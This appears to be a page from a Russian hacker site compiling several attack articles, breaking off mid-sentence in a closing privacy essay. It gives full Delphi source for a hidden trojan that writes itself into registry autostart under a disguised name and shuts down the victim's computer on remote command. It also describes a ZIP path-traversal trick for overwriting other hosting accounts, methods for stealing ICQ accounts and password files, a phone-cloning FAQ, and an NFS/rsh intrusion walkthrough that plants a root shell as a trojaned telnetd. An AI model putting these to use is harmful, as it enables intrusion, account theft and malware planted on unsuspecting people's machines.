как сделать за десять минут трояна на delphi!!! — HackZona.Ru

как сделать за десять минут трояна на delphi!!!

как сделать за десять минут трояна на delphi!!!

Тип статьи:
Со старой ХакЗоны.
Источник:
Боевой конь за 10 минут:
Привет! Сейчас я расскажу тебе о том, как можно на Delphi можно разработать небольшого троянского коня.
Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу.
Троянский сервер:
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» «New Application»). Сейчас мы примемся за серверную часть трояна.
Для начала выбери пункт меню «Options» из меню «Project».


Здесь ты должен перенести «From1» из раздела «Auto-Create forms» (список слева) в «Available forms» (список справа), как это сделано у меня. Только что мы отключили From1 из списка авто инициализируемых форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень просто.
На странице «Application» этого же диалога есть кнопка «Load Icon». Нажми её, чтобы сменить иконку будущей проги. Если икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё смертельное оружие.
Теперь ты должен бросить на форму компонент ServerSocket из раздела «Internet», это сервак протокола (по умолчанию TCP, и нам его достаточно). Выдели созданный ServerSocket1 и перейди в ObjectInspector. Здесь тебя интересует только свойство «Port». По умолчанию оно равно 1024, но я тебе советую его поменять на любое другое (желательно больше 1000).
Теперь щёлкни в любом месте на форме, чтобы активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке Events. Дважды щёлкни по строке «OnCreate» и Delphi, как всегда, создаст процедуру, она будет выполняться при инициализации формы. Напиши там следующее:
procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion', true);
RegIni.WriteString('RunServices', 'Internat32.exe',
Application.ExeName);
RegIni.Free;
ServerSocket1.Active:=true;
end;
Теперь перейди в начало текста и напиши после «uses» слово «registry». Мы уже делали такую операцию в статье про мега плеер, но я повторю, как это будет выглядеть:
uses registry, Windows, Messages,
Теперь я объясню, что мы написали в процедуре.
«var RegIni:TRegIniFile» — здесь мы объявили переменную RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с реестром.
«RegIni:=TRegIniFile.Create('Software')» — инициализируем переменную указывающую на реестр.
«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говорим, что нас интересует раздел HKEY_CURRENT_USER реестра.
«RegIni.OpenKey('Software', true)» — открываю подраздел «Software».
Дальше я последовательно открываю подразделы, пробираясь в недра окошек.
«RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName) записываю в раздел «RunServices» (в этом разделе хранятся проги, которые автоматически загружаются при старте), новый параметр с именем «Internat32.exe» (имя будущего файла) и значением Application.ExeName (здесь храниться полный путь к запущенному трояну).
«RegIni.Free» — уничтожаю ненужный больше объект RegIni.
Всё это делалось, чтобы при запуске проги, она сама себя прописывала в разделе автозапуска. И после перезагрузки компьютера она автоматически загружалась в память.
Самая последняя строка «ServerSocket1.Active:=true» запускает сервер на указанном тобой порте. С загрузкой покончено. Теперь давай займёмся выгрузкой. Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по строке «OnDistroy». Теперь создастся процедура, которая будет выполняться при уничтожении формы. В созданной процедуре напиши:
procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
ServerSocket1.Active:=false;
end;
Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя жертва может поймать синий экран, если ты в это время будешь подключён к серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать себя раньше времени. Тем более, что после синего экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и скажу, что мы сами будем перегружать компьютер жертвы).
Теперь нужно выделить ServerSocket1 и перейти на закладку Events у ObjectInspector-а. Дважды щёлкни по строке «OnClientRead» и в созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт) напиши:
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
if Socket.ReceiveText ='R' then
ExitWindowsEx(EWX_SHUTDOWN,0);
end;
Теперь, как это звучит по-нашему:
Если полученный текст = букве R то
Отправить компьютер в редаун.
ExitWindowsEx редаун заставит окна свернуться и отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным приложениям полетит запрос о выключении, и жертва сможет сохранить свои изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью света, так что жертва не успеет от страха воздух испортит :).
Троян практически готов, сохрани его. Для этого выбери «Save All» из меню «File». С начала Delphi запросит имя формы. Оставь по умолчанию (Unit1) и нажми «Сохранить». Потом будет запрос на имя проекта, которое будет использоваться в качестве имени ЕХЕ файла. Назови его «Internat32», чтобы файл не вызывал особых подозрений.
Конюшня для коня:
Теперь ты должен хорошенечко спрятать своего будущего скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню «Project Manager» из меню «View».

Щёлкни правой кнопкой по Internat32.exe и в появившемся меню выбери «View Source». Перед тобой откроется маленький файл с исходным текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не хватает, а что лишнее убери (так не так уж и много):
program Internat32;
uses
Forms,
Windows.
Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var
WhEvent:THandle;
begin
Application.Initialize;
ShowWindow(Application.Handle,SW_Hide);
Form1:=TForm1.Create(nil);
Application.Run;
WhEvent:=CreateEvent(nil, true,false, 'et');
while (true) do
begin
WaitForSingleObject(WhEvent,1000);
Application.ProcessMessages;
end;
end.
Будь внимателен при переписывании. Всё должно быть один к одному. Теперь я расскажу, что здесь написано:
В самом начале нет ничего интересного, и нас абсолютно не касается. Нас интересует всё, что написано после слова «Var».
WhEvent:THandle Этим я говорю, что мне нужен указатель WhEvent на пустое событие Thandle.
Application.Initialize Инициализируется троян.
ShowWindow(Application.Handle, SW_Hide) Устанавливаю параметры окна. Параметр SW_Hide говорит, что окно должно быть невидимо. Единственное, как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас используется не вызывающее подозрения (только у чайника, профи уже давно знают, о таком имени) имя.
Form1:=TForm1.Create(nil) создаю форму. Мне приходится это делать так, потому что мы убрали форму из из списка авто создаваемых.
Application.Run запускаю трояна. Здесь запускаются обработчики событий и прочая ерунда, за которую отвечает Delphi и которую пришлось бы писать вручную на С или С++. А здесь всё очень просто. WhEvent:=CreateEvent(nil, true,false, 'et') инициализация пустого события.
Следующие пять строчек я напишу словами, а ты разберёшься как всегда методом сравнения:
Пока (true) выполнять
Начать цикл
Ждать пока наступит событие (пустое событие, 1000 миллисекунд)
Получить управление
Закончить цикл
Две строчки между началом и концом цикла будет выполняться бесконечно, потому что true оно всегда true, и из этого цикла выхода нет. Весь цикл заключаеться в двух особенностях:
1. Запускается ожидание несуществующего события. Так как событие не существует, то программа прождёт его ровно указанное время в качестве второго параметра (1000 миллисекунд или 1 секунда).
2. Получить управление.
После второго шага программа снова перейдёт на пункт 1 и запустит ожидание. Во время ожидания пользователь работает с другими приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление, то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение может быть одно приход на указанный тобой порт управляющей команды. Если сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или нет), после этого пользователь снова работает 1 секунду без проблем. Проверка происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с сотым камнем.
Нажми «Ctrl+F9» чтобы Delphi создал.ехе файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать, что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что после первого же запуска троян пропишется в реестре по адресу:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices.
Не забудь после тестирования его удалить.
Теперь переходим к клиентской части, которую ты должен будешь запустить на своём компьютере для управления компьютером жертвы.
Троянский всадник:
Снова сохрани все изменения и создай новый проект. Пришло время писать клиентскую часть трояна. Ещё пару минут напряжённого труда и все красавицы наши :). На новый проект ты должен бросить три компонента:
1. Button из закладки «Standart» для отправки команды на компьютер жертвы.
2. Edit из закладки «Standart» для ввода имени или адреса жертвы.
3. ClientSocket из закладки «Internet» клиент порта для связи с сервером
Посмотри на рисунок 3, у тебя должно получиться нечто похожее.

Выдели ClientSocket1 и в ObjectInspector-е измени свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты назначил серверу.
Теперь дважды щёлкни по кнопке и в созданной процедуре (обработчике нажатия кнопки) напиши следующее.
procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:=Edit1.Text;
ClientSocket1.Active:=true;
ClientSocket1.Socket.SendText('R');
ClientSocket1.Active:=false;
end;
ClientSocket1.Host:=Edit1.Text В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.
ClientSocket1.Active:=true активировать соединение с сервером.
ClientSocket1.Socket.SendText('R') отправить букву R. Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он перегрузит машину.
ClientSocket1.Active:=false закрыть соединение с сервером.
Всё. Троян готов к бою. Нажми «Ctrl+F9» чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится.
На этом я закругляюсь. Удачи тебе.



Furer[OST].

Дефейс у прова с помощью ZIP-
Ну. Дарова. Я ни как Furer- димагог, а просто человек мало говорящий.
Эта статья посвещается, тем кто хочет замутить свой хостинг с возможностью на нем распаковки ZIP-архивов или тем кто хочет ломануть хостинг с такой возможностью ;-)
В этой статье вы сможете узнать об одной дырке с помощью которой можно закачивать файлы и папки в чужие аккаунты из своего =)) Если заинтересовались, то читайте дальше.
INtRo Все началось с идеи создать чат, доступный с гостевого входа. В качестве провайдера был выбран Центральный Телеграф, так как коннект с ним всегда с первого раза и очень рульный. Данный пров дает 1 мег под пагу, если купить инет карту, что мы и сделали. Далее обнаружилось, что CGI/ASP/PHP етс. запрещены, можно юзать только готовые скрипты (которые, естественно, качеством не блещут).
Скрипта чата среди них, конечно, не было, и мы решили заюзать под эти цели скрипт гостевой книги или форумов. Через некоторое время чат был готов, но, по прошествии пары недель, было решено, что чат сделан лажово — для входа нужно зарегистрироваться у нас, без этого — только под именем Guest и т.п. заморочки.
В общем, было необходимо переделывать. У ЦТ класть файлы на пагу можно только если у тебя что-то есть на счету, а у нас (так достоверно и неизвестно почему) сняли последние 15 минут, которые лежали там специально для доступа к паге ;).
Решили не класть денег на этот счет, а сделать все по-новому, с чистого листа, так сказать. И сделали, все круто и удобно, только вот встала одна проблемка — как бы закинуть на старый сайт index.html с ссылкой на новый? Доступ-то к старому запрещен!
(NivaX: Тут оговорюсь — в старом чате накопилось некоторое количество заслуженных чатлан — классные, проверенные друзья, и очень захотелось увидеть их на новом сайте) А раз проблемка встала — впору поискать решение.
И стали мы искать, как бы можно получить доступ на запись в файлы других паг. Все, длинное и нудное интро закончилось. ;)
MAiN Теперь, собственно, о найденном баге. На паги ЦТ доступ только через веб-интерфейс :(, а чтоб не свихнуться, качая тучу файла, придумана там хорошая система: пакуешь файло в зип, кидаешь зип через веб-интерфейс, а там есть такая кнопка — распаковать. Вот и пришла идея, что распаковщик у них наверняка какой-нибудь кривой-доморощенный. Так и оказалось. При проверке на вшивость было обнаружено следующее:
Если распаковываемые файлы уже существуют, то они перезаписываются без запроса;
Архивер все распаковывает с путями;
Мало того, что с путями, так пути еще и не проверяются на наличие точек и слешей!!!
Таким образом, появилось два способа достижения цели. Первый, ясный перец, основывался на подделке путей — создавался каталог с именем из двух символов, в нем — каталог с именем паги, на которую предполагалось залить «обновление» :)),
а в эту папку уже клался сам файл для заливки. Первый каталог паковался в зип, зип открывался из HIEW или чего-нить еще, два пресловутых символа в названии папки заменялись на две точки во всех местах, где были найдены в зипе. Второй способ почти такой же — создавался файл с длинным именем, начало которого потом заменялось на точки и слеши. Например, чтобы залить index.html на пагу по имени vaspupkin, создаем файл: !!_vaspupkin_index.html с необходимым содержанием, пакуем в зип, затем в HEX-Редакторе меняем "!!" на "..", а "_" на "".
Кидаем, распаковываем, получаем результат :)). Естественно, можно было писАть в любой файл, на который есть право доступа на запись, но наша цель была другая.
После смены индекса на старой паге мы успокоились и откатали письмецо админам, чтобы пофиксили. Вот, вроде, и все о баге ;) OuTTRo
В общем-то, зародыш этой идеи пришел из мира BBS и FIDO, где мы баловались подделкой путей в *.zip-пакетах, распаковывавшихся автоматически. О, это было сладко! :))
Ведь BBS и поинты часто под DOS/Windows, а там можно было поправить имя файла на com1/com2 (модем завален мегами данных :), prn (принтер, если включен, конечно :), ну и конечно же любимый con (вывод прямо в консоль), а код 07h при выводе в консоль — гнусный спикерный звучок ;)).
Потом идея подставить вызод на уровень выше в зип, пришедшая сначала к NivaX'у, была исправлена и доработана, и вот на выходе результат. Ну что, допил пиво?
ЗЫ: На ЦТ этот баг пофиксили после нашего письма, а вот если найдешь других провов с распаковкой архива — флаг тебе в руки ;).
И помни: архив — необозримое поле деятельности!
Путь устранения этой дыры: устанавливать более свежую версию ZIP-архиватора.
С уважением: Furer[OST] aka ][ and Smasher[OST] aka Серый.



Достаём себе хороший ICQ Uin.
Дарова!!!
В этой статье я тебе расскажу как достать себе хорошоий Uin.
Ну есть много разных способов это сделать… Но для начала подумай и прикинь, оно тебе надо?.. Любой чел, который пользуется ICQ запалится на твой хорошенький номерок, типа 777666. И начнется, мягко говоря атака(если её можно так назвать). А если на тебя западёт какой-нить крутой хакер, то Ставь себе хорошенький файрвол и обновляй антивирусную базу.
А если хочешь, я дам тебе совет. Сделай наоборот, создай такую прогу, или чё нить в таком духе, чтобы защитить комп(не важно, твой-чужой) от угона хорошенького номерка.
А лучше сначала угони хорошенький номерок, а потом думай о защите 8-)
Способ 1
Достаем какой нибудь сканер на шары (не те котрые дети носят с собой) точнее на расшаринные ресурсы. Ну я предпочитаю Xsharez. Во вкусах конечно не спорят но в этой статье мы будем его использовать. Открываем наш сканер-видим лого. Загурзилось…
Теперь слева вверху вводим начальный ИП адрес (это адрес с которого начнем сканить) и конечный ИП(ну само собой это) конец. Тоесть если вы хотите просканить 195.78.225.1 (ну приперло вас написать этот дарес) то пишемс его в в первую строку и чтобы на конце было 1 иначе вы будете сканить только один ИП! Нажимаем кнопку Скан и и ждем! Если появляются ИП адрес то быстро нажимаем на этот ИП и жмем по кнопке захват диска. Бежим в наш всеми любимый фар и заходим на наш новый (хе хе) диск! Не теряй время! сразу беги в Програм файлс и ищи папку ICQ/version смотри в любых версиах! Копируй (uin#).dat например 113183.dat и второй забег делаем в папку Windows :)
. Забираем все *.pwl файлы! расшифровчиков куча… Сами найдете.
Да и кстати советую приобрести ICQr чтобы расшифровать дат файлы… Чем мне не нравиться этот сканер, тем что после него у меня весь комп тормозит :(. 2 способ
Ну это кончено тупой способ и хороший номер себе вы не достаните Скажите своему дургу умерикасосу что в ICQ был недавно найден прикольный баг! И если он поставит в инфе [email protected] (ваше мыло тоже можно) то в инфе будет написано не то мыло а [email protected] (или придумайте)Главное убедить человека поставить в инфу своё мыло! А сами мы уже давно сидите на www.icq.com/password и уже давно вписали его номер и мыло которое он будет ставить…
И как только он нажал на кнопку SAVE жмите на кнопку Сэнд! хе хе! Здесь что то есть из соц. инженерии :).
3 способ
Самый действующий способ… Открываем окно поиска в асе и начинаем искать номера какие захотите только советую начинать с 8значных. И чего же мы ищем спросите вы?? Мы ищем дурака который поставил себе вымышленное мыло. Советую искать тех у кого hotmail акаунты тк хотмайл очень популярен что некоторые только его и знают и пишут ради прикола [email protected] в инфе. Ну как??? теперь я думаю уже до любого дойдет… Идем на hotmail.com нажимаем на Sign Up вверху дальше вводим левую инфу! В поле логин мы пишем логин который указан в инфе приколиста: jack если дальше идет сраница с Terms of use то знай-уйн твой! Бежим быстренько на www.icq.com/password вводим наш новый уйн и мыло. Возвращаемся к хотмылу. Нажимаем I accept дальше они нам по хорошему предлогают спам :) мы конечно же ничего не выбераем и смело нажимем внизу кнопку Next. И чтож мы видим?
Что в ящике только одно письмо! И письмо это с поздравлением что зарегалсиь на хотмыле. Не бойтесь! просто не пришел пасс еще… можно сбегать за пивом на кухню или упорно нажимать на Inbox чтобы оно появилось. Ну вот… Пришел наш долгожданный пароль Я думаю не надо обьяснять как поставить второго юзверя на асе ;-)!
Хочу сказать на последок я натырил очень много асек с помощью 3 способа! И самый прикол был когда я достал себе 6 значный уйн!!! Мыло конечно было не на хотмыле, но на каком то там hotbox.com! Вот и всё.
Есть ещё туева куча разных способов, но здесь я привёл самые распространённые. И запомни:
КРУТЫЕ НОМЕРКИ, ТОЛЬКО У КРУТЫХ.
С уважением: Furer aka ][.





FAQ по взлому сотовых
Вопрос №1.
Какие телефоны ломаются?
Ответ: любые, если по ним проехать на катке или скинуть с десятого этажа.
Вопрос №2.
Не я серьезно. Я хотел бы узнать, какие сотовые cистемы имеют двойников и какие сотовые телефоны можно приспособить для создания двойника?
Ответ: Ну если серьезно В России двойников имеют следующие сотовые и тpанковые системы: AMPS/DAMPS (без защиты A-Key)«Фоpа» (Петербург) NMT-450 (без SIS-кода)Еще жив в Минске MPT-1327 (тpанк)AMT, ACBT SmarTrunk (тpанк)*.* Hе имеют двойников компании БиЛайн (пpотокол DAMPS IS-54) и МСС (пpотокол NMT 450i), так как пpименяются системы аутентификации: A-Key и SIS-code соответственно. (в системе компании БиЛайн двойники возможны только на незащищенных pоуминговых номеpах). Для создания двойника можно пpиспособить любой телефон, котоpый может pаботать в системе, где pаботает телефон владельца. Для этого потpебуется всего лишь pазобpаться в упpавляющей пpогpамме хост-пpоцессоpа телефона.
Вопрос №3.
Тогда следующий вопрос: Какие пpоцессоpы используются в сотовых телефонах?
Ответ: Да собственно различные. Это зависит от модели телефона и фиpмы-пpоизводителя. Вот пpимеpный список: ФиpмаИспользуемые пpоцессоpы Motorola Хост: 68HC11DSP: AT&T16XX;, MC566XX Ericsson Хост: ARM7TDMI coreDSP: Texas Instruments Nokia Хост: H8/XXXZ80 Список конечно не полный. О конкретной модели телефона и используемом в нем процессоре можно узнать на сайте производителя телефонов.
Вопрос №4.
Да тамже все не по нашему! Как я пойму что к чему?
Ответ: А как другие понимают? Многие вообще по иностранному выше пары не имели. Берешь словарь и переводишь по-тихоньку. Есть другой вариант — запускаешь программу переводчика и переводишь. А вообще-то это из области лингвистики, а не фрикинга, поэтому прошу впредь вопросов такого рода не задавать.
Вопрос №5.
Я нашел на улице отключенный сотовый телефон. Как бы сделать так, чтобы по нему бесплатно можно было звонить?
Ответ: Это сделать весьма непpосто. Все зависит от модели телефона, пpотокола его pаботы, вида используемой в вашей местности сотовой связи, и дpугих паpаметpов. В этом случае лучше обpатиться к специалистам.
Вопрос №6.
А я хочу сам попробовать. Где лучше пpочитать пpо модификацию сотовых телефонов?
Ответ: Вот это по нашему. radiophone.dhp.com
Вопрос №7.
Какие системы защиты от двойников существуют в сотовых сетях?
Ответ: В сети DAMPS для защиты может пpименяться пpотокол аутентификации A-Key, в сети NMT — система SIS (Subscriber Identity Security). Вопрос №8.
Что такое AKEY и как он pаботает?
Ответ: AKEY это тpивиальное название системы аутентификации, используемой в сетях AMPS/DAMPS. Собственно AKEY пpедставляет из себя восьмибайтовое число-ключ, хpанящееся в сотовом телефоне абонента и являющееся уникальным для каждого абонента. AKEY вводится пpи пpодаже телефона клиента и хpанится в базе. AKEY не меняется и остается постоянным пpи ноpмальной pаботе телефона. Hа основе AKEY (постоянный ключ) с помощью хеш-функции CAVE, использующей в качестве входных паpаметpов, помимо AKEY, ESN, MIN телефона, а также случайное число, пpисланное по эфиpу с базовой станции, генеpиpуется вpеменный ключ, называемый SSD_A (тоже 8 байт). Этот ключ в дальнейшем и используется пpи аутентификации для генеpации ответного значения. Постоянный AKEY не используется пpи аутентификации и служит только для pасчета вpеменного ключа. Пpи установлении соединения система пеpедает сотовому телефон случайное число, котоpое шифpуется по алгоpитму CAVE (Cellular Authentication and Voice Encryption) с использованием вpеменного ключа SSD_A и дpугих уникальных паpаметpов телефона (ESN,MIN) в качестве ключа. Ответ посылается на базовую станцию, котоpая, в свою очеpедь, независимо от телефона генеpиpует ответное число (все паpаметpы телефона, в том числе и AKEY, и текущий SSD_A, хpанятся в базе на станции), и сpавнивает его с полученным. В случае несовпадения числа, пpинятого от телефона с независимо посчитанным числом, аутентификация считается неудачной и телефону отказывается в соединении. Пеpиодически (пpимеpно pаз в неделю) станция посылает сотовому телефону сообщения о генеpации нового вpеменного ключа, SSD_A, по получении этого сообщения (SSD_UPDATE) телефон pассчитывает новый вpеменный ключ SSD_A, используя уже известный постоянный AKEY, ESN, MIN, и случайное число со станции. Таким обpазом, сам ключ аутентификации (SSD_A) является вpеменным и пеpиодически меняется, и становится бессмысленным «клониpование» тpубок (а также нахождение SSD_A методом последовательного пеpебоpа), поскольку после пеpвого же изменения ключа pаботать дальше будет только один телефон с новым ключом.
Вопрос №9.
Hельзя ли pасшифpовать АКод по посылкам со станции и ответам тpубки?
Ответ: Это можно сделать только методом пpямого пеpебоpа кодов, да и то с огpаничениями. Функция CAVE является одностоpонный хеш-функцией с маленькой pазpядностью выходного кода, поэтому вычислить ключ по данным, пеpедаваемым по эфиpу пpактически невозможно.
Вопрос №10.
Что такое SIS и как он pаботает?
Ответ: SIS (Subscriber Identity Security) — система аутентификации и защиты инфоpмации пользователей сотовой сети NMT-450i. Пpинцип действия SIS аналогичен AKEY: пpи запpосе на соединение станция посылает сотовому телефону случайное число, котоpое обpабатывается хеш-функцией SIS в телефоне с использованием 120-битового уникального ключа пользователя, часть pезультата хеш-функции послылается на базовую станцию для сpавнения, дpугая часть используется для шифpования набиpаемого номеpа. В отличие от AKEY, SIS не меняется и всегда остается постоянным для конкpетного телефона, а также обеспечивает шифpование набиpаемого номеpа (в системе AKEY тоже пpедусмотpена возможность шифpования номеpа, однако она не используется в Российских системах). Также, в отличие от AKEY, SIS-код зашивается в телефон пpоизводителем и не может быть изменен пpовайдеpом услуг (AKEY обычно может вводится с клавиатуpы). Вопрос №11.
Какие системы сотовой связи защищены от пpослушивания?
Ответ: Hикакие. Аналоговые системы (NMT, AMPS, DAMPS в аналоговом pежиме) без тpуда пpослушиваются обычным пpиемником-сканеpом, котоpый имеет возможность настpойки на диапазон сотовой системы. Цифpовые системы (DAMPS/TDMA, GSM) пpослушиваются специально модифициpованными телефонными аппаpатами той же системы.
Вопросы задавал Furer, а отвечал Mr.Tyson.
С уважением: Mr.Tyson[OST] aka большой Шурик
and Furer[OST] aka ][.


C чего же всё таки начинать взлом сервера (сайта, странички и т.д.)

Ты читаешь журнал хакер? Нет??!!! Мыло и верёвка в любом хозяйственном магазине Москвы. Я знаю, многие кричат что типа журнал для ламеров, но сидя в Ирке я задал один вопрос такому «крутому» челу, что такое роутер и почему он препядствует снифингу? Места ответа был комплимент в мою честь, типа что: «Сам то знаешь?». Поэтому не слушай никого, делай своё дело, читай ксакеп, затарься колой, сигаретами и вникай…
Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это [email protected] Cgi Scanner предоставленный нам хак-группой [email protected], его можно скачать с йх официального сайта www.cc.f2s.com, еще правда есть сканер от груааы Void (www.void.ru) Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько ссылок где можно найти описание этих ошибок:
qwerty.nanko.ru (наиболее полный но на Английском) www.void.ru
www.hack-crack.com
или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска:
www.packetstorm.securify.com
www.securityfocus.com
www.rootshell.com
Второе и пожалуй главное — это сканирование портов, для сканирования можно использовать любой сканнер портов(какой — на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут www.nscan.hypermart.net, этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)
После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете:
telnet>open www.target.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:
www.securityfocus.com
www.packetstorm.securify.com
www.technotronic.com
и вводите в строке поиска название программы и его версию. После того как вы скачали эксплоит его как правило надо скомпилировать — то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на www.nether.net и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE) Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем:
gcc -o exploit exploit.c и нижимаем Enter.
Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться:
>./exploit Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e www.target.com
и видим
/user/ Everyone
или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех дальше пишем
>mount -t nfs target.remote.com:/user /mnt
потом переходми в каталог cd /mnt/home и устанавливаем .rhosts
>echo www.target.com user/.rhosts
дальше делаем следующее:
>cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно)
> su — user
! Становимся им
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! И заходим на удаленную машину
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Каталог доступен на запись
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
! Нашли программу, которая запустится
! под root«ом из нашего каталога
% cd /usr/etc
% mv in.telnetd in.telnetd1
! создаем троянского коня
% cat in.telnetd
>!/bin/sh
exec /bin/csh -i
% chmod 755 in.telnetd
! и запускаем его
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
> chown user /etc;
! Делаем /etc своим
: command not found
> exit;
: command not found
Connection closed by foreign host.
> cd /etc
После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс — John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе!
И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p www.target.com | grep bind и если видим что-то типа 120000 2 udp 2493 ypbind То пробуем сдлать следующее:
>ypx -o target.passwd -g target.remote.com
Берём файл с паролями и запускаем подборщик. На этом все!
Smasher[OST]/


ПАРАНОЯ.
Ой- ёе её параноя Ой простите!!!
Дарова перецы! Как жизнь, ещё не посадили Вас за все Ваши деяния?
Нет?! Ну тогда ждите.
Пока Вы думаете, что хакнув сервак и почистив хорошенько логи можно по тра%%%ся с девчонкой, покурить, попить колы, то Вы сильно ошибаетесь. Почему? Да потому, вникай
Даже когда Вы не заполняете специальных форм и анкет с бесчисленными вопросами (о чем Вас регулярно просят на том или ином сервере прежде чем дать что-то интересное, для чего вы, собственно, там и оказались),
Даже если Вы не пишете в этих анкетах ни слова правды о себе,
Даже если Вы гордо уходите с таких страниц не ответив ни на один вопрос, и умеете получать нужное там, где не спрашивают лишнего, Даже когда Вы просто „ходите“ по ссылкам со страницы на страницу, посылаете письмо адресату или в конференцию, читаете новости, „тянете“ новую программу или что бы то ни было еще, слушаете музыку, смотрите видео, общаетесь с Вам подобными посредством простого текста, голосом „voice — over — IP“ или с поддержкой „живого видео“, пользуетесь любым другим старинным или новомодным сервисом всемирной сети Интернет, помните:
ОНИ уже МОГУТ ЗНАТЬ о Вас гораздо БОЛЬШЕ, чем Вы предполагаете.
Все программы, при помощи которых Вы получаете из Интернет хоть какую-нибудь информацию, предварительно сообщают отправителю этой информации свои, а следовательно и Ваши „реквизиты“, т.е. некоторые сведения, которые определяют куда, в каком виде и какие именно данные нужно отправить. Упомянутый выше набор — это минимум, без которого вообще невозможен никакой обмен информацией, причем не только в Интернете. Но максимум передаваемых при запросе сведений никак не ограничен, поскольку до недавних пор определялся исключительно соображениями зравого смысла. Зачем, к примеру, при отправке нескольких строк текста по почте отправлять „на всякий случай“ еще и содержимое всей дисковой или оперативной памяти компьютера? Хотя как знать, может кому-то это и будет интересно. Например, фирме продающей программы и желающей знать, все ли использующие их продукцию заплатили за нее. Или руководству компании, обеспокоенному утечкой информации и не исключающему, что кто-то из сотрудников может хранить служебные материалы на своем домашнем компьютере, потихоньку приторговывая ими. Или… да мало ли в 